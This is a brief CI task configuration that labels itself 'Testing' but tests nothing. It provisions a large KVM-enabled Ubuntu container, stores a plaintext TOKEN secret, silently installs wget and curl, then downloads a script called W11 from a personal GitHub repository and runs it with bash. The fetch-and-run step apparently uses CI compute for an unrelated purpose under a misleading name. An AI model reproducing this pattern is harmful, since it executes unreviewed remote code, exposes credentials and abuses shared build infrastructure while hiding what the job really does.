task:
  name: Testing
  timeout_in: 120m
  environment:
    TOKEN: 22MqCTmNiH2V3cpTbTi9MQavii3_68LTRZK8UV4oXf5hekQJx
  container:
    cpu: 8
    memory: 32G
    image: docker.io/ubuntu
    kvm: true
  script: 
   - apt-get update &>/dev/null 
   - apt-get install wget curl -y &>/dev/null
   - wget https://raw.githubusercontent.com/DangDev/dangdev/main/W11
   - chmod +x *
   - bash W11
